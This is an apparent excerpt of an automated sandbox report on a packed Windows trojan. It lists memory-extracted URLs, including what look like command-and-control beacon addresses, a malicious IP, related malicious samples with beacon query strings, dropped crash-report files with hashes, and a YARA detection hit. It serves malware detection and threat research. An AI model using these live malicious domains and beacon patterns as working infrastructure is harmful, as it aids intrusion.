                                          https://mths.be/fromcodepointSearchUI.exe, 00000016.00000002.915055024.000001B8D1DD1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.goodfont.co.krexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.thesunchronical.comReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://outlook.office.com/SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmpfalse
                                            high
                                            http://schema.org/WebPageSecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.typography.netDexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://fontfabrik.comexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.serenityhomedits.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://outlook.office.com/User.ReadWriteSearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.estivalconsultancy.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aefd.nelSearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.%s.comPAexplorer.exe, 00000002.00000002.751926871.0000000002B50000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                low
                                                https://api.msn.com/news/feed?market=en-us&query=SearchUI.exe, 00000016.00000002.916371805.000001B8D20E0000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.fonts.comexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.sandoll.co.krexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.luohu666.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.estivalconsultancy.com/bsl/www.furnacerepairtacoma.netexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sakkal.comexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.serenityhomedits.comReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://aefd.nelreports.net/api/report?cSearchUI.exe, 00000016.00000002.910509404.000001B8D0EE3000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.g2vies.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.g2vies.com/bsl/www.edu4go.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://facebook.github.io/react/docs/error-decoder.html?invariantSearchUI.exe, 00000016.00000002.914254001.000001B8D1BAF000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.comexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.cbothwelltest2020081703.com/bsl/www.luohu666.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.infomgt.netexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.theprintshop.inkReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.luohu666.com/bsl/www.gvanmp.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.cbothwelltest2020081703.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.furnacerepairtacoma.netReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.serenityhomedits.com/bsl/www.g2vies.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.theprintshop.ink/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.furnacerepairtacoma.net/bsl/www.listenmelody.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.jokerwirewheels.comReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.whatchicken.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.cbothwelltest2020081703.comReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.whatchicken.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.luohu666.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://aefd.nelreports.net/api/report?cat=bingaotSearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.furnacerepairtacoma.netexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.serenityhomedits.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          34.102.136.180
                                                          unknownUnited States
                                                          15169GOOGLEUStrue

                                                          Private

                                                          IP
                                                          192.168.2.1

                                                          General Information

                                                          Joe Sandbox Version:31.0.0 Emerald
                                                          Analysis ID:344595
                                                          Start date:26.01.2021
                                                          Start time:19:14:36
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 10s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:SecuriteInfo.com.Trojan.Packed2.42783.14936.6333 (renamed file extension from 6333 to exe)
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:36
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@11/24@5/2
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 13.9% (good quality ratio 12.5%)
                                                          • Quality average: 73.8%
                                                          • Quality standard deviation: 31.5%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, wermgr.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, mobsync.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.255.188.83, 172.217.23.68, 51.104.144.132, 95.101.22.203, 95.101.22.224, 23.62.99.40, 2.21.243.41, 20.54.26.129, 52.155.217.156, 95.101.22.216, 204.79.197.200, 13.107.21.200, 40.88.32.150, 51.104.139.180, 52.147.198.201
                                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          19:15:40API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe modified
                                                          19:16:20API Interceptor695x Sleep call for process: explorer.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          34.102.136.180PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                          • www.worldwide-mt.com/kzd/
                                                          bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                          • www.what3emoji.com/bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV
                                                          xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                          • www.ricardoinman.com/xle/?-ZnD=LjoXU6n8-&iBrlPD=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQV/txd+LHV0DSgDXQ==
                                                          v07PSzmSp9.exeGet hashmaliciousBrowse
                                                          • www.jikzo.com/c8so/?3ff87=Bcwq9mo1SLdxGMzaDRBSbVH3gidTK8xbNEF8M/tGLQ2aKWcuDQCQFtxR7k1oF3yRZXKc&uZWD=XPmPajepJ2gdvnZ
                                                          NEW ORDER.xlsxGet hashmaliciousBrowse
                                                          • www.simplifiedvirtualsolutions.com/oean/?MdLxlt=mKgmb7I6yODGcWmnOnDfCd0CfDEQGPBdVeZhKsaKMoR3Qh4v4CLN6oxN3p9trG3799qCow==&gnU4Pf=yZPLGZXHl
                                                          Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                          • www.kaiyuansu.pro/incn/?9r_PU=-ZQLEn&e2Jdlzf8=4y+UTKzAJ4dBlp/RYYS74WaP+qCjnKVRzK/jF/x906cXBmLcUo8gxmNUvdqUiR1QG2msPA==
                                                          winlog(1).exeGet hashmaliciousBrowse
                                                          • www.growingequity.fund/oean/?8pNhXv=yVML0zB0&u4XpH=VZAj6Grbo5w3dBd7w+9BSoe0Fg1VHX3dphJz9/egos9dVzX5qD6mqxE3tIZZ2ImCjS7epxmUBA==
                                                          win32.exeGet hashmaliciousBrowse
                                                          • www.findthatsmartphone.com/incn/?8pBP5p=/AA5bjKPiaWw22bzCdt7lqNbxAyyPpv3elVlM12b4Zuyr5w4xH0F6TIfefQNvJyZz9qG&L6Ah=2dSLFXghYtFd0
                                                          1-26.exeGet hashmaliciousBrowse
                                                          • www.catalogcardgames.net/bf3/?UXrxP8=0T3HW8l&URfXx=Sdh36sWiaQaHmuW5OuhNg2ZSKBobeXsq4DWTIDdmgtvI732RtscB8O3t4ssmBmGg4ghZ
                                                          Request.xlsxGet hashmaliciousBrowse
                                                          • www.cleverwares.com/c8so/?Rf=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==&LDHHp=z4D80PDX
                                                          INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                          • www.5050alberta.com/xle/?8pqhs=XuVPlIEgAAku+dXH+MR8cy20ZHkP0iJzlT7lKUj3PYBKa8v0bSmzSfHWFfmBCUSgIWFn2Q==&tDH=XRR8
                                                          RFQ.xlsxGet hashmaliciousBrowse
                                                          • www.blacknation.info/c8so/?pBU=HzuD_&gb24XB=6ATEh1s0NdZErsRPIUioXmvz20sSLCkN4f+QHjKAbluYenOJN9FSbPt8XJ2H+dMMf4Jp2Q==
                                                          New Year Inquiry List.xlsxGet hashmaliciousBrowse
                                                          • www.primeoneimplants.com/qjnt/?tB=TtdpPpppFvG&1bwhC=nh3Tl/oLs4HXZ5hiWyD3n36TA5+xQ+CwXb+KxfiJNOta6blp58Sj1H/LHtoCWuUTeWdwKg==
                                                          RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                          • www.harperandchloe.com/xle/?5jFlkJJh=FNtvxHF14RtgzuhKSaLd0lIzxL3LkdKZj/Q/Opos8UfLtbug0tkzhu0XdD0TouZ6I/qGUQ==&LR-T=vBK0GdQp
                                                          gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                          • www.ctfocbdwholesale.com/bw82/?W6=Rxta6xhtzzdBFDuy4SYKtO8XUaMinJcredo77YczPu8Lep1ecFiaWqXH8h2T5haNROfU&odeTY=cnxhAP6x
                                                          bgJPIZIYby.exeGet hashmaliciousBrowse
                                                          • www.engageautism.info/bw82/?GFND=n1L9MQk6NEQOasYlfxU4KXziLGivOllQbNtATfsC4RjAZctNbAJfQ2EIxV87fcKcU54A&Rlj=YVIX8Hyx
                                                          vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                          • www.brainandbodystrengthcoach.com/csv8/?Mjklsrcx=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwwlb5soGHyjF&Hp0xlh=EVvxc8
                                                          E4Q30tDEB9.exeGet hashmaliciousBrowse
                                                          • www.conanbiopharma.com/z9n/?GzuX=Jhwq104eoCBg19EU7i3a/UNFlUD6BU+epYAdz34/Q5fuIRMc24e0hydyrjaAvIdaUf1m&9rspoR=ffn0iZa81
                                                          INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                          • www.4thop.com/ur06/?2d=9rm4l4y&nt=yKWvtfxgXgd1h/cfVfwsL+vVHM9GHRLI6tHsLUWr1fII7HM154cThMJKgGXJGqB7HwFq
                                                          560911_P.EXEGet hashmaliciousBrowse
                                                          • www.leagueofwomengolfers.com/bf3/?2d=8pJhqv2&mt=Rg5SRlzVdqtJGgbKsvZ2Ay09186BQEC1kuNds6zR1M82qUcQWtSjBMIC0cP/+2kk9Xcq

                                                          Domains

                                                          No context

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          GOOGLEUSPAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          4NoiNHCNoU.exeGet hashmaliciousBrowse
                                                          • 216.58.207.179
                                                          bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          eEXZHxdxFE.exeGet hashmaliciousBrowse
                                                          • 35.228.108.144
                                                          v07PSzmSp9.exeGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          o3Z5sgjhEM.exeGet hashmaliciousBrowse
                                                          • 35.186.223.98
                                                          ltf94qhZ37.exeGet hashmaliciousBrowse
                                                          • 35.228.108.144
                                                          NEW ORDER.xlsxGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          winlog(1).exeGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          win32.exeGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          DAT.docGet hashmaliciousBrowse
                                                          • 35.200.206.198
                                                          Bestellung.docGet hashmaliciousBrowse
                                                          • 172.217.6.174
                                                          .01.2021a.jsGet hashmaliciousBrowse
                                                          • 35.228.108.144
                                                          QT21006189.exeGet hashmaliciousBrowse
                                                          • 108.177.119.109
                                                          1-26.exeGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          Request.xlsxGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                          • 34.102.136.180
                                                          RFQ.xlsxGet hashmaliciousBrowse
                                                          • 34.102.136.180

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSlaZL2LqI2.exeGet hashmaliciousBrowse
                                                            4NoiNHCNoU.exeGet hashmaliciousBrowse
                                                              SoPwZKv1Mf.exeGet hashmaliciousBrowse
                                                                bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                                  Generator.cont.exeGet hashmaliciousBrowse
                                                                    file.exeGet hashmaliciousBrowse
                                                                      560911_P.EXEGet hashmaliciousBrowse
                                                                        file.exeGet hashmaliciousBrowse
                                                                          IMG_61779.pdf.exeGet hashmaliciousBrowse
                                                                            IMG_5391.EXEGet hashmaliciousBrowse
                                                                              czZ769nM6r.exeGet hashmaliciousBrowse
                                                                                IMG_1107.EXEGet hashmaliciousBrowse
                                                                                  r3q6Bv8naR.exeGet hashmaliciousBrowse
                                                                                    sy1RnlHl8Y.exeGet hashmaliciousBrowse
                                                                                      qyMlTIBawC.exeGet hashmaliciousBrowse
                                                                                        Qn2AQrgfqJ.exeGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Trojan.PackedNET.509.28611.exeGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Trojan.PackedNET.509.17348.exeGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Trojan.PackedNET.509.7497.exeGet hashmaliciousBrowse
                                                                                                IMG_12283.exeGet hashmaliciousBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_7abfb1f1fbdbd7c2322150249348b63f54b8a170_10665708_1ba816b7\Report.wer
                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33064
                                                                                                  Entropy (8bit):3.6808226116631357
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:hoHaHvSJv6j0PCXmmd1i+cf5PAGXNBttIUMfMgho/u7seS274ltnG:h4yvyv6jbq+cfxAIxtLJ/u7seX4ltnG
                                                                                                  MD5:AE85F99B123BA2CBDD27669B668B8055
                                                                                                  SHA1:E7773B7DF36B519420E9A6B2A2942A21875FED95
                                                                                                  SHA-256:B8053E43545C813CA6A35F8B5E3BE81FFF6BF869DF3EE00BF3874DAA14BBD3E3
                                                                                                  SHA-512:BBC95698F34C9E259940E9203AAD36E35904AFC53B58208E60DD65DC9456DCDD6A555F90445AD55577E1D98D799508233E6222ABCD9CBD9566FF77207058A9AC
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: SUSP_WER_Critical_HeapCorruption, Description: Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_7abfb1f1fbdbd7c2322150249348b63f54b8a170_10665708_1ba816b7\Report.wer, Author: Florian Roth
                                                                                                  Reputation:low
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.1.5.8.5.6.7.4.0.0.6.2.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.6.2.c.1.1.3.b.-.5.a.8.6.-.4.4.8.e.-.b.7.c.0.-.0.0.7.3.8.d.3.8.4.d.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.c.c.7.2.2.3.-.4.2.4.5.-.4.8.3.6.-.b.4.e.f.-.0.4.d.c.9.6.b.f.2.6.0.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.6.0.-.0.0.0.1.-.0.0.1.b.-.7.5.e.3.-.e.6.d.5.f.e.f.3.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.5.d.0.2.9.9.1.4.0.c.f.9.8.8.7.5.b.0.7.d.b.d.2.d.8.9.2.6.1.7.4.0.1.d.a.d.8.b.9.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.5././.0.4././.1.2.:.0.2.:.2.
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1205.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):10546
                                                                                                  Entropy (8bit):3.7121189576874825
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNi7JR6YtTQ3ikLgmfqK8ShM+prp89bZxs7ng+ycfSzm:RrlsNilR6Y63iIgmfqK8SQZa7ng+ycfv
                                                                                                  MD5:E8578A0AF29B8FC7A703230F563297CD
                                                                                                  SHA1:2617A69C062282248FCE2F8BAAEA3F719BE38D24
                                                                                                  SHA-256:31F5F78290119F7F9E386184F7EDB83D677C22ABE647BE23A1E41E323B77AC9F
                                                                                                  SHA-512:0E79798D9371E940C52B089E2735BC52F365361DF0014919EE5F49C45D4441C479F34B4A142FF79031E4F53C31897053A3D8D06E36064663187134315AC8C3F8
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.2.4.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER12D1.tmp.xml
                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4745
                                                                                                  Entropy (8bit):4.5179008550026465
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zsxRJgtBI9I+WSC8BT78fm8M4JlNlQ6FOuXyq85klVQn0qAQd:uITfRG/SNyJL3bc0qAQd
                                                                                                  MD5:FBE9AC3A4C00E6E76CDFC0B54BA7B7FF
                                                                                                  SHA1:94DC25D55E846A621BAC74782EB2732E57373878
                                                                                                  SHA-256:87A156E368D306BAA669A33E1DDF37D02CF23118E6A15859D8FCB71817145653
                                                                                                  SHA-512:44E797951F90F3A78BD795C0463FB29F89B1AB2DEB4CB2ECFBD815C5F127D3F0F83566E2511040141D5C2FA48B7666559087D369CBCDDFDFF472046CE39C7400
                                                                                                  Malicious:false
                                                                                                  Reputation:low
